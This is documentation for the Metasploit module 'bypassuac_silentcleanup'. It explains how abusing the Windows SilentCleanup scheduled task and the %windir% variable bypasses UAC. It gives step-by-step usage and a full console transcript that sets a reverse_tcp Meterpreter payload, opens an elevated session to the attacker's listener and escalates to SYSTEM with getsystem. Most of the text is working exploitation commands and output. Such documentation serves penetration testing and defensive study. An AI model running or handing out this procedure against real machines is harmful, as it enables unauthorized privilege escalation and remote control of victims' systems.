3.3 KiB
3.3 KiB
Introduction
This module will bypass UAC on any Windows installation with Powershell installed.
There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.
Usage
- Create a session on the target system under the context of a local administrative user.
- Begin interacting with the module:
use exploit/windows/local/bypassuac_silentcleanup. - Set the
PAYLOADand configure it correctly, making sure the architecture is correct. - If an existing handler is configured to receive the elevated session, then the module's
handler should be disabled:
set DisablePayloadHandler true. - Make sure that the
SESSIONvalue is set to the existing session identifier. - Invoke the module:
run.
Scenarios
msf5 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
6 meterpreter x86/windows DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP 192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x)
msf5 > use exploit/windows/local/bypassuac_silentcleanup
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf5 exploit(windows/local/bypassuac_silentcleanup) > options
Module options (exploit/windows/local/bypassuac_silentcleanup):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 6 yes The session to run this module on.
SLEEPTIME 0 no The time (ms) to sleep before running SilentCleanup
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.55 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > run
[*] Started reverse TCP handler on 192.168.1.xx:4444
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 192.168.1.x
[*] Meterpreter session 10 opened (192.168.1.xx:4444 -> 192.168.1.x:55538) at 2019-06-20 15:00:14 -0400
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > bg
[*] Backgrounding session 10...
msf5 exploit(windows/local/bypassuac_silentcleanup) >